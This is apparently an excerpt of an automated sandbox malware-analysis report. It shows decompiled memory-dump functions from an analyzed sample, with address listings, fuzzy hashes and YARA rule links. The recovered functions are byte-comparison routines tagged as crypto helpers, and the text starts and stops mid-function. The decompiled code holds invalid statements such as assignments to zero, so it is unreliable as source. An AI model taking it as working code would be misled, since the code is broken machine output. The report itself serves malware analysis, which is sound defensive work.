					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
					if(__edi == 0) {
						L8:
						__edi =  *(__esi - 0x1d) & 0x000000ff;
						__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
						if(__edi == 0) {
							L10:
							__edi =  *(__esi - 0x1c) & 0x000000ff;
							__edi = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
							if(__edi == 0) {
								L12:
								__ecx =  *(__esi - 0x1b) & 0x000000ff;
								__ecx = ( *(__esi - 0x1b) & 0x000000ff) - ( *(__edx - 0x1b) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L15;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								L2:
								_t192 = _t241;
								return _t192;
							}
							goto L12;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L2;
						}
						goto L10;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L2;
					}
					goto L8;
				}
			}

0x00c48fc4
0x00c48fc4
0x00c48fca
0x00c49051
0x00c49053
0x00c49055
0x00000000
0x00000000
0x00c4905b
0x00c49061
0x00c490e8
0x00c490ea
0x00c490ec
0x00000000
0x00000000
0x00c490f2
0x00c490f8
0x00c4917f
0x00c49181
0x00c49183
0x00000000
0x00000000
0x00c49189
0x00c4918f
0x00c49216
0x00c49218
0x00c4921a
0x00000000
0x00000000
0x00c49220
0x00c49226
0x00c492ad
0x00c492af
0x00c492b1
0x00000000
0x00000000
0x00c492bd
0x00c49345
0x00c49347
0x00c49349
0x00000000
0x00000000
0x00c4934f
0x00c49355
0x00c493dc
0x00c493de
0x00c493e0
0x00c493e0
0x00000000
0x00c493e0
0x00c49362
0x00c49364
0x00c4937c
0x00c49384
0x00c49386
0x00c4939e
0x00c493a6
0x00c493a8
0x00c493c0
0x00c493c8
0x00c493ca
0x00c493d3
0x00c493d3
0x00000000
0x00c493ca
0x00c493b1
0x00c493ba
0x00000000
0x00000000
0x00000000
0x00c493ba
0x00c4938f
0x00c49398
0x00000000
0x00000000
0x00000000
0x00c49398
0x00c4936d
0x00c49376
0x00000000
0x00000000
0x00000000
0x00c49376
0x00c492cb
0x00c492cd
0x00c492e5
0x00c492ed
0x00c492ef
0x00c49307
0x00c4930f
0x00c49311
0x00c49329
0x00c49331
0x00c49333
0x00c4933c
0x00c4933c
0x00000000
0x00c49333
0x00c4931a
0x00c49323
0x00000000
0x00000000
0x00000000
0x00c49323
0x00c492f8
0x00c49301
0x00000000
0x00000000
0x00000000
0x00c49301
0x00c492d6
0x00c492df
0x00000000
0x00000000
0x00000000
0x00c492df
0x00c49233
0x00c49235
0x00c4924d
0x00c49255
0x00c49257
0x00c4926f
0x00c49277
0x00c49279
0x00c49291
0x00c49299
0x00c4929b
0x00c492a4
0x00c492a4
0x00000000
0x00c4929b
0x00c49282
0x00c4928b
0x00000000
0x00000000
0x00000000
0x00c4928b
0x00c49260
0x00c49269
0x00000000
0x00000000
0x00000000
0x00c49269
0x00c4923e
0x00c49247
0x00000000
0x00000000
0x00000000
0x00c49247
0x00c4919c
0x00c4919e
0x00c491b6
0x00c491be
0x00c491c0
0x00c491d8
0x00c491e0
0x00c491e2
0x00c491fa
0x00c49202
0x00c49204
0x00c4920d
0x00c4920d
0x00000000
0x00c49204
0x00c491eb
0x00c491f4
0x00000000
0x00000000
0x00000000
0x00c491f4
0x00c491c9
0x00c491d2
0x00000000
0x00000000
0x00000000
0x00c491d2
0x00c491a7
0x00c491b0
0x00000000
0x00000000
0x00000000
0x00c491b0
0x00c49105
0x00c49107
0x00c4911f
0x00c49127
0x00c49129
0x00c49141
0x00c49149
0x00c4914b
0x00c49163
0x00c4916b
0x00c4916d
0x00c49176
0x00c49176
0x00000000
0x00c4916d
0x00c49154
0x00c4915d
0x00000000
0x00000000
0x00000000
0x00c4915d
0x00c49132
0x00c4913b
0x00000000
0x00000000
0x00000000
0x00c4913b
0x00c49110
0x00c49119
0x00000000
0x00000000
0x00000000
0x00c49119
0x00c4906e
0x00c49070
0x00c49088
0x00c49090
0x00c49092
0x00c490aa
0x00c490b2
0x00c490b4
0x00c490cc
0x00c490d4
0x00c490d6
0x00c490df
0x00c490df
0x00000000
0x00c490d6
0x00c490bd
0x00c490c6
0x00000000
0x00000000
0x00000000
0x00c490c6
0x00c4909b
0x00c490a4
0x00000000
0x00000000
0x00000000
0x00c490a4
0x00c49079
0x00c49082
0x00000000
0x00000000
0x00000000
0x00c48fd0
0x00c48fd0
0x00c48fd7
0x00c48fd9
0x00c48ff1
0x00c48ff1
0x00c48ff9
0x00c48ffb
0x00c49013
0x00c49013
0x00c4901b
0x00c4901d
0x00c49035
0x00c49035
0x00c4903d
0x00c4903f
0x00c49048
0x00c49048
0x00000000
0x00c4903f
0x00c49023
0x00c49026
0x00c4902f
0x00c48b87
0x00c48b87
0x00c49977
0x00c49977
0x00000000
0x00c4902f
0x00c49001
0x00c49004
0x00c4900d
0x00000000
0x00000000
0x00000000
0x00c4900d
0x00c48fdf
0x00c48fe2
0x00c48feb
0x00000000
0x00000000
0x00000000
0x00c48feb

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction ID: 1a8ac4e5e558b1823897a0502bcb9585967c0ae971dbd279d31abdd2380f9a20
Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
Instruction Fuzzy Hash: E7C164722051A30EDF2D463A887457FBAA1AAA27B531E075DD8B3CB5D5EF20C628D610

Uniqueness

Uniqueness Score: -1.00%

Function 00C493F9, Relevance: .3, Instructions: 341
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C493F9(void* __edx, void* __esi) {
				signed int _t196;
				signed char _t197;
				signed char _t198;
				signed char _t199;
				signed char _t201;
				signed char _t202;
				signed int _t245;
				void* _t293;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t314;
				void* _t316;
				void* _t318;
				void* _t320;
				void* _t322;
				void* _t324;
				void* _t326;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t335;

				_t335 = __esi;
				_t293 = __edx;
				if( *((intOrPtr*)(__esi - 0x1f)) ==  *((intOrPtr*)(__edx - 0x1f))) {
					_t245 = 0;
					L14:
					if(_t245 != 0) {
						goto L1;
					}
					_t197 =  *(_t335 - 0x1b);
					if(_t197 ==  *(_t293 - 0x1b)) {
						_t245 = 0;
						L25:
						if(_t245 != 0) {
							goto L1;
						}
						_t198 =  *(_t335 - 0x17);
						if(_t198 ==  *(_t293 - 0x17)) {
							_t245 = 0;
							L36:
							if(_t245 != 0) {
								goto L1;
							}
							_t199 =  *(_t335 - 0x13);
							if(_t199 ==  *(_t293 - 0x13)) {
								_t245 = 0;
								L47:
								if(_t245 != 0) {
									goto L1;
								}
								if( *(_t335 - 0xf) ==  *(_t293 - 0xf)) {
									_t245 = 0;
									L58:
									if(_t245 != 0) {
										goto L1;
									}
									_t201 =  *(_t335 - 0xb);
									if(_t201 ==  *(_t293 - 0xb)) {
										_t245 = 0;
										L69:
										if(_t245 != 0) {
											goto L1;
										}
										_t202 =  *(_t335 - 7);
										if(_t202 ==  *(_t293 - 7)) {
											_t245 = 0;
											L80:
											if(_t245 != 0) {
												goto L1;
											}
											_t296 = ( *(_t335 - 3) & 0x000000ff) - ( *(_t293 - 3) & 0x000000ff);
											if(_t296 == 0) {
												L83:
												_t298 = ( *(_t335 - 2) & 0x000000ff) - ( *(_t293 - 2) & 0x000000ff);
												if(_t298 == 0) {
													L3:
													_t245 = ( *(_t335 - 1) & 0x000000ff) - ( *(_t293 - 1) & 0x000000ff);
													if(_t245 != 0) {
														_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
													}
													goto L1;
												}
												_t245 = (0 | _t298 > 0x00000000) * 2 - 1;
												if(_t245 != 0) {
													goto L1;
												} else {
													goto L3;
												}
											}
											_t245 = (0 | _t296 > 0x00000000) * 2 - 1;
											if(_t245 != 0) {
												goto L1;
											}
											goto L83;
										}
										_t300 = (_t202 & 0x000000ff) - ( *(_t293 - 7) & 0x000000ff);
										if(_t300 == 0) {
											L73:
											_t302 = ( *(_t335 - 6) & 0x000000ff) - ( *(_t293 - 6) & 0x000000ff);
											if(_t302 == 0) {
												L75:
												_t304 = ( *(_t335 - 5) & 0x000000ff) - ( *(_t293 - 5) & 0x000000ff);
												if(_t304 == 0) {
													L77:
													_t245 = ( *(_t335 - 4) & 0x000000ff) - ( *(_t293 - 4) & 0x000000ff);
													if(_t245 != 0) {
														_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
													}
													goto L80;
												}
												_t245 = (0 | _t304 > 0x00000000) * 2 - 1;
												if(_t245 != 0) {
													goto L1;
												}
												goto L77;
											}
											_t245 = (0 | _t302 > 0x00000000) * 2 - 1;
											if(_t245 != 0) {
												goto L1;
											}
											goto L75;
										}
										_t245 = (0 | _t300 > 0x00000000) * 2 - 1;
										if(_t245 != 0) {
											goto L1;
										}
										goto L73;
									}
									_t306 = (_t201 & 0x000000ff) - ( *(_t293 - 0xb) & 0x000000ff);
									if(_t306 == 0) {
										L62:
										_t308 = ( *(_t335 - 0xa) & 0x000000ff) - ( *(_t293 - 0xa) & 0x000000ff);
										if(_t308 == 0) {
											L64:
											_t310 = ( *(_t335 - 9) & 0x000000ff) - ( *(_t293 - 9) & 0x000000ff);
											if(_t310 == 0) {
												L66:
												_t245 = ( *(_t335 - 8) & 0x000000ff) - ( *(_t293 - 8) & 0x000000ff);
												if(_t245 != 0) {
													_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
												}
												goto L69;
											}
											_t245 = (0 | _t310 > 0x00000000) * 2 - 1;
											if(_t245 != 0) {
												goto L1;
											}
											goto L66;
										}
										_t245 = (0 | _t308 > 0x00000000) * 2 - 1;
										if(_t245 != 0) {
											goto L1;
										}
										goto L64;
									}
									_t245 = (0 | _t306 > 0x00000000) * 2 - 1;
									if(_t245 != 0) {
										goto L1;
									}
									goto L62;
								}
								_t312 = ( *(_t335 - 0xf) & 0x000000ff) - ( *(_t293 - 0xf) & 0x000000ff);
								if(_t312 == 0) {
									L51:
									_t314 = ( *(_t335 - 0xe) & 0x000000ff) - ( *(_t293 - 0xe) & 0x000000ff);
									if(_t314 == 0) {
										L53:
										_t316 = ( *(_t335 - 0xd) & 0x000000ff) - ( *(_t293 - 0xd) & 0x000000ff);
										if(_t316 == 0) {
											L55:
											_t245 = ( *(_t335 - 0xc) & 0x000000ff) - ( *(_t293 - 0xc) & 0x000000ff);
											if(_t245 != 0) {
												_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
											}
											goto L58;
										}
										_t245 = (0 | _t316 > 0x00000000) * 2 - 1;
										if(_t245 != 0) {
											goto L1;
										}
										goto L55;
									}
									_t245 = (0 | _t314 > 0x00000000) * 2 - 1;
									if(_t245 != 0) {
										goto L1;
									}
									goto L53;
								}
								_t245 = (0 | _t312 > 0x00000000) * 2 - 1;
								if(_t245 != 0) {
									goto L1;
								}
								goto L51;
							}
							_t318 = (_t199 & 0x000000ff) - ( *(_t293 - 0x13) & 0x000000ff);
							if(_t318 == 0) {
								L40:
								_t320 = ( *(_t335 - 0x12) & 0x000000ff) - ( *(_t293 - 0x12) & 0x000000ff);
								if(_t320 == 0) {
									L42:
									_t322 = ( *(_t335 - 0x11) & 0x000000ff) - ( *(_t293 - 0x11) & 0x000000ff);
									if(_t322 == 0) {
										L44:
										_t245 = ( *(_t335 - 0x10) & 0x000000ff) - ( *(_t293 - 0x10) & 0x000000ff);
										if(_t245 != 0) {
											_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
										}
										goto L47;
									}
									_t245 = (0 | _t322 > 0x00000000) * 2 - 1;
									if(_t245 != 0) {
										goto L1;
									}
									goto L44;
								}
								_t245 = (0 | _t320 > 0x00000000) * 2 - 1;
								if(_t245 != 0) {
									goto L1;
								}
								goto L42;
							}
							_t245 = (0 | _t318 > 0x00000000) * 2 - 1;
							if(_t245 != 0) {
								goto L1;
							}
							goto L40;
						}
						_t324 = (_t198 & 0x000000ff) - ( *(_t293 - 0x17) & 0x000000ff);
						if(_t324 == 0) {
							L29:
							_t326 = ( *(_t335 - 0x16) & 0x000000ff) - ( *(_t293 - 0x16) & 0x000000ff);
							if(_t326 == 0) {
								L31:
								_t328 = ( *(_t335 - 0x15) & 0x000000ff) - ( *(_t293 - 0x15) & 0x000000ff);
								if(_t328 == 0) {
									L33:
									_t245 = ( *(_t335 - 0x14) & 0x000000ff) - ( *(_t293 - 0x14) & 0x000000ff);
									if(_t245 != 0) {
										_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
									}
									goto L36;
								}
								_t245 = (0 | _t328 > 0x00000000) * 2 - 1;
								if(_t245 != 0) {
									goto L1;
								}
								goto L33;
							}
							_t245 = (0 | _t326 > 0x00000000) * 2 - 1;
							if(_t245 != 0) {
								goto L1;
							}
							goto L31;
						}
						_t245 = (0 | _t324 > 0x00000000) * 2 - 1;
						if(_t245 != 0) {
							goto L1;
						}
						goto L29;
					}
					_t330 = (_t197 & 0x000000ff) - ( *(_t293 - 0x1b) & 0x000000ff);
					if(_t330 == 0) {
						L18:
						_t332 = ( *(_t335 - 0x1a) & 0x000000ff) - ( *(_t293 - 0x1a) & 0x000000ff);
						if(_t332 == 0) {
							L20:
							_t334 = ( *(_t335 - 0x19) & 0x000000ff) - ( *(_t293 - 0x19) & 0x000000ff);
							if(_t334 == 0) {
								L22:
								_t245 = ( *(_t335 - 0x18) & 0x000000ff) - ( *(_t293 - 0x18) & 0x000000ff);
								if(_t245 != 0) {
									_t245 = (0 | _t245 > 0x00000000) * 2 - 1;
								}
								goto L25;
							}
							_t245 = (0 | _t334 > 0x00000000) * 2 - 1;
							if(_t245 != 0) {
								goto L1;
							}
							goto L22;
						}
						_t245 = (0 | _t332 > 0x00000000) * 2 - 1;
						if(_t245 != 0) {
							goto L1;
						}
						goto L20;
					}
					_t245 = (0 | _t330 > 0x00000000) * 2 - 1;
					if(_t245 != 0) {
						goto L1;
					}
					goto L18;
				} else {
					__edi = __al & 0x000000ff;
					__edi = (__al & 0x000000ff) - ( *(__edx - 0x1f) & 0x000000ff);
					if(__edi == 0) {
						L7:
						__edi =  *(__esi - 0x1e) & 0x000000ff;
						__edi = ( *(__esi - 0x1e) & 0x000000ff) - ( *(__edx - 0x1e) & 0x000000ff);
						if(__edi == 0) {
							L9:
							__edi =  *(__esi - 0x1d) & 0x000000ff;
							__edi = ( *(__esi - 0x1d) & 0x000000ff) - ( *(__edx - 0x1d) & 0x000000ff);
							if(__edi == 0) {
								L11:
								__ecx =  *(__esi - 0x1c) & 0x000000ff;
								__ecx = ( *(__esi - 0x1c) & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
								if(__ecx != 0) {
									__ecx = (0 | __ecx > 0x00000000) * 2 - 1;
								}
								goto L14;
							}
							0 = 0 | __edi > 0x00000000;
							__ecx = (__edi > 0) * 2 != 1;
							if((__edi > 0) * 2 != 1) {
								goto L1;
							}
							goto L11;
						}
						0 = 0 | __edi > 0x00000000;
						__ecx = (__edi > 0) * 2 != 1;
						if((__edi > 0) * 2 != 1) {
							goto L1;
						}
						goto L9;
					}
					0 = 0 | __edi > 0x00000000;
					__ecx = (__edi > 0) * 2 != 1;
					if((__edi > 0) * 2 != 1) {
						goto L1;
					}
					goto L7;
				}
				L1:
				_t196 = _t245;
				return _t196;
			}

0x00c493f9
0x00c493f9
0x00c493ff
0x00c49486
0x00c49488
0x00c4948a
0x00000000
0x00000000
0x00c49490
0x00c49496
0x00c4951d
0x00c4951f
0x00c49521
0x00000000
0x00000000
0x00c49527
0x00c4952d
0x00c495b4
0x00c495b6
0x00c495b8
0x00000000
0x00000000
0x00c495be
0x00c495c4
0x00c4964b
0x00c4964d
0x00c4964f
0x00000000
0x00000000
0x00c4965b
0x00c496e3
0x00c496e5
0x00c496e7
0x00000000
0x00000000
0x00c496ed
0x00c496f3
0x00c4977a
0x00c4977c
0x00c4977e
0x00000000
0x00000000
0x00c49784
0x00c4978a
0x00c49811
0x00c49813
0x00c49815
0x00000000
0x00000000
0x00c49823
0x00c49825
0x00c4983d
0x00c49845
0x00c49847
0x00c48fa1
0x00c48fa9
0x00c48fab
0x00c48fb8
0x00c48fb8
0x00000000
0x00c48fab
0x00c49854
0x00c48f9b
0x00000000
0x00000000
0x00000000
0x00000000
0x00c48f9b
0x00c4982e
0x00c49837
0x00000000
0x00000000
0x00000000
0x00c49837
0x00c49797
0x00c49799
0x00c497b1
0x00c497b9
0x00c497bb
0x00c497d3
0x00c497db
0x00c497dd
0x00c497f5
0x00c497fd
0x00c497ff
0x00c49808
0x00c49808
0x00000000
0x00c497ff
0x00c497e6
0x00c497ef
0x00000000
0x00000000
0x00000000
0x00c497ef
0x00c497c4
0x00c497cd
0x00000000
0x00000000
0x00000000
0x00c497cd
0x00c497a2
0x00c497ab
0x00000000
0x00000000
0x00000000
0x00c497ab
0x00c49700
0x00c49702
0x00c4971a
0x00c49722
0x00c49724
0x00c4973c
0x00c49744
0x00c49746
0x00c4975e
0x00c49766
0x00c49768
0x00c49771
0x00c49771
0x00000000
0x00c49768
0x00c4974f
0x00c49758
0x00000000
0x00000000
0x00000000
0x00c49758
0x00c4972d
0x00c49736
0x00000000
0x00000000
0x00000000
0x00c49736
0x00c4970b
0x00c49714
0x00000000
0x00000000
0x00000000
0x00c49714
0x00c49669
0x00c4966b
0x00c49683
0x00c4968b
0x00c4968d
0x00c496a5
0x00c496ad
0x00c496af
0x00c496c7
0x00c496cf
0x00c496d1
0x00c496da
0x00c496da
0x00000000
0x00c496d1
0x00c496b8
0x00c496c1
0x00000000
0x00000000
0x00000000
0x00c496c1
0x00c49696
0x00c4969f
0x00000000
0x00000000
0x00000000
0x00c4969f
0x00c49674
0x00c4967d
0x00000000
0x00000000
0x00000000
0x00c4967d
0x00c495d1
0x00c495d3
0x00c495eb
0x00c495f3
0x00c495f5
0x00c4960d
0x00c49615
0x00c49617
0x00c4962f
0x00c49637
0x00c49639
0x00c49642
0x00c49642
0x00000000
0x00c49639
0x00c49620
0x00c49629
0x00000000
0x00000000
0x00000000
0x00c49629
0x00c495fe
0x00c49607
0x00000000
0x00000000
0x00000000
0x00c49607
0x00c495dc
0x00c495e5
0x00000000
0x00000000
0x00000000
0x00c495e5
0x00c4953a
0x00c4953c
0x00c49554
0x00c4955c
0x00c4955e
0x00c49576
0x00c4957e
0x00c49580
0x00c49598
0x00c495a0
0x00c495a2
0x00c495ab
0x00c495ab
0x00000000
0x00c495a2
0x00c49589
0x00c49592
0x00000000
0x00000000
0x00000000
0x00c49592
0x00c49567
0x00c49570
0x00000000
0x00000000
0x00000000
0x00c49570
0x00c49545
0x00c4954e
0x00000000
0x00000000
0x00000000
0x00c4954e
0x00c494a3
0x00c494a5
0x00c494bd
0x00c494c5
0x00c494c7
0x00c494df
0x00c494e7
0x00c494e9
0x00c49501
0x00c49509
0x00c4950b
0x00c49514
0x00c49514
0x00000000
0x00c4950b
0x00c494f2
0x00c494fb
0x00000000
0x00000000
0x00000000
0x00c494fb
0x00c494d0
0x00c494d9
0x00000000
0x00000000
0x00000000
0x00c494d9
0x00c494ae
0x00c494b7
0x00000000
0x00000000
0x00000000
0x00c49405
0x00c49405
0x00c4940c
0x00c4940e
0x00c49426
0x00c49426
0x00c4942e
0x00c49430
0x00c49448
0x00c49448
0x00c49450
0x00c49452
0x00c4946a
0x00c4946a
0x00c49472
0x00c49474
0x00c4947d
0x00c4947d
0x00000000
0x00c49474
0x00c49458
0x00c4945b
0x00c49464
0x00000000
0x00000000
0x00000000
0x00c49464
0x00c49436
0x00c49439
0x00c49442
0x00000000
0x00000000
0x00000000
0x00c49442
0x00c49414
0x00c49417
0x00c49420
0x00000000
0x00000000
0x00000000
0x00c49420
0x00c48b87
0x00c48b87
0x00c49977

Memory Dump Source

Source File: 00000000.00000002.209147890.0000000000C41000.00000020.00020000.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.209140665.0000000000C40000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209170066.0000000000C58000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209181620.0000000000C5F000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209186235.0000000000C60000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.209201167.0000000000C66000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209265852.0000000000CC9000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction ID: d4273f79e97d3c8a7a841042f92d4b387c8ada6066735af468755b5495d62077
Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
Instruction Fuzzy Hash: 88C18B721051A30EDF6D463AC87453FBAA1EAA27B531E175DD8B3CB5D4EF20C628D610

Uniqueness

Uniqueness Score: -1.00%

Function 00C48B8F, Relevance: .3, Instructions: 331
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00C48B8F(void* __edx, void* __esi) {
				signed int _t184;
				signed char _t185;
				signed char _t186;
				signed char _t187;
				signed char _t188;
				signed char _t190;
				signed int _t231;
				void* _t275;
				void* _t278;
				void* _t280;
				void* _t282;
				void* _t284;
				void* _t286;
				void* _t288;
				void* _t290;
				void* _t292;
				void* _t294;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				void* _t310;
				void* _t312;
				void* _t313;

				_t313 = __esi;
				_t275 = __edx;
				if( *((intOrPtr*)(__esi - 0x1d)) ==  *((intOrPtr*)(__edx - 0x1d))) {
					_t231 = 0;
					L11:
					if(_t231 != 0) {
						goto L1;
					}
					_t185 =  *(_t313 - 0x19);
					if(_t185 ==  *(_t275 - 0x19)) {
						_t231 = 0;
						L22:
						if(_t231 != 0) {
							goto L1;
						}
						_t186 =  *(_t313 - 0x15);
						if(_t186 ==  *(_t275 - 0x15)) {
							_t231 = 0;
							L33:
							if(_t231 != 0) {
								goto L1;
							}
							_t187 =  *(_t313 - 0x11);
							if(_t187 ==  *(_t275 - 0x11)) {
								_t231 = 0;
								L44:
								if(_t231 != 0) {
									goto L1;
								}
								_t188 =  *(_t313 - 0xd);
								if(_t188 ==  *(_t275 - 0xd)) {
									_t231 = 0;
									L55:
									if(_t231 != 0) {
										goto L1;
									}
									if( *(_t313 - 9) ==  *(_t275 - 9)) {
										_t231 = 0;
										L66:
										if(_t231 != 0) {
											goto L1;
										}
										_t190 =  *(_t313 - 5);
										if(_t190 ==  *(_t275 - 5)) {
											_t231 = 0;
											L77:
											if(_t231 == 0) {
												_t231 = ( *(_t313 - 1) & 0x000000ff) - ( *(_t275 - 1) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
											}
											goto L1;
										}
										_t278 = (_t190 & 0x000000ff) - ( *(_t275 - 5) & 0x000000ff);
										if(_t278 == 0) {
											L70:
											_t280 = ( *(_t313 - 4) & 0x000000ff) - ( *(_t275 - 4) & 0x000000ff);
											if(_t280 == 0) {
												L72:
												_t282 = ( *(_t313 - 3) & 0x000000ff) - ( *(_t275 - 3) & 0x000000ff);
												if(_t282 == 0) {
													L74:
													_t231 = ( *(_t313 - 2) & 0x000000ff) - ( *(_t275 - 2) & 0x000000ff);
													if(_t231 != 0) {
														_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
													}
													goto L77;
												}
												_t231 = (0 | _t282 > 0x00000000) * 2 - 1;
												if(_t231 != 0) {
													goto L1;
												}
												goto L74;
											}
											_t231 = (0 | _t280 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L72;
										}
										_t231 = (0 | _t278 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L70;
									}
									_t284 = ( *(_t313 - 9) & 0x000000ff) - ( *(_t275 - 9) & 0x000000ff);
									if(_t284 == 0) {
										L59:
										_t286 = ( *(_t313 - 8) & 0x000000ff) - ( *(_t275 - 8) & 0x000000ff);
										if(_t286 == 0) {
											L61:
											_t288 = ( *(_t313 - 7) & 0x000000ff) - ( *(_t275 - 7) & 0x000000ff);
											if(_t288 == 0) {
												L63:
												_t231 = ( *(_t313 - 6) & 0x000000ff) - ( *(_t275 - 6) & 0x000000ff);
												if(_t231 != 0) {
													_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
												}
												goto L66;
											}
											_t231 = (0 | _t288 > 0x00000000) * 2 - 1;
											if(_t231 != 0) {
												goto L1;
											}
											goto L63;
										}
										_t231 = (0 | _t286 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L61;
									}
									_t231 = (0 | _t284 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L59;
								}
								_t290 = (_t188 & 0x000000ff) - ( *(_t275 - 0xd) & 0x000000ff);
								if(_t290 == 0) {
									L48:
									_t292 = ( *(_t313 - 0xc) & 0x000000ff) - ( *(_t275 - 0xc) & 0x000000ff);
									if(_t292 == 0) {
										L50:
										_t294 = ( *(_t313 - 0xb) & 0x000000ff) - ( *(_t275 - 0xb) & 0x000000ff);
										if(_t294 == 0) {
											L52:
											_t231 = ( *(_t313 - 0xa) & 0x000000ff) - ( *(_t275 - 0xa) & 0x000000ff);
											if(_t231 != 0) {
												_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
											}
											goto L55;
										}
										_t231 = (0 | _t294 > 0x00000000) * 2 - 1;
										if(_t231 != 0) {
											goto L1;
										}
										goto L52;
									}
									_t231 = (0 | _t292 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L50;
								}
								_t231 = (0 | _t290 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L48;
							}
							_t296 = (_t187 & 0x000000ff) - ( *(_t275 - 0x11) & 0x000000ff);
							if(_t296 == 0) {
								L37:
								_t298 = ( *(_t313 - 0x10) & 0x000000ff) - ( *(_t275 - 0x10) & 0x000000ff);
								if(_t298 == 0) {
									L39:
									_t300 = ( *(_t313 - 0xf) & 0x000000ff) - ( *(_t275 - 0xf) & 0x000000ff);
									if(_t300 == 0) {
										L41:
										_t231 = ( *(_t313 - 0xe) & 0x000000ff) - ( *(_t275 - 0xe) & 0x000000ff);
										if(_t231 != 0) {
											_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
										}
										goto L44;
									}
									_t231 = (0 | _t300 > 0x00000000) * 2 - 1;
									if(_t231 != 0) {
										goto L1;
									}
									goto L41;
								}
								_t231 = (0 | _t298 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L39;
							}
							_t231 = (0 | _t296 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L37;
						}
						_t302 = (_t186 & 0x000000ff) - ( *(_t275 - 0x15) & 0x000000ff);
						if(_t302 == 0) {
							L26:
							_t304 = ( *(_t313 - 0x14) & 0x000000ff) - ( *(_t275 - 0x14) & 0x000000ff);
							if(_t304 == 0) {
								L28:
								_t306 = ( *(_t313 - 0x13) & 0x000000ff) - ( *(_t275 - 0x13) & 0x000000ff);
								if(_t306 == 0) {
									L30:
									_t231 = ( *(_t313 - 0x12) & 0x000000ff) - ( *(_t275 - 0x12) & 0x000000ff);
									if(_t231 != 0) {
										_t231 = (0 | _t231 > 0x00000000) * 2 - 1;
									}
									goto L33;
								}
								_t231 = (0 | _t306 > 0x00000000) * 2 - 1;
								if(_t231 != 0) {
									goto L1;
								}
								goto L30;
							}
							_t231 = (0 | _t304 > 0x00000000) * 2 - 1;
							if(_t231 != 0) {
								goto L1;
							}
							goto L28;
						}
						_t231 = (0 | _t302 > 0x00000000) * 2 - 1;
						if(_t231 != 0) {
							goto L1;
						}
						goto L26;
					}
					_t308 = (_t185 & 0x000000ff) - ( *(_t275 - 0x19) & 0x000000ff);
					if(_t308 == 0) {
						L15:
						_t310 = ( *(_t313 - 0x18) & 0x000000ff) - ( *(_t275 - 0x18) & 0x000000ff);
						if(_t310 == 0) {
							L17:
							_t312 = ( *(_t313 - 0x17) & 0x000000ff) - ( *(_t275 - 0x17) & 0x000000ff);
							if(_t312 == 0) {
								L19:
								_t231 = ( *(_t313 - 0x16) & 0x000000ff) - ( *(_t275 - 0x16) & 0x000000ff);
								if(_t231 != 0) {
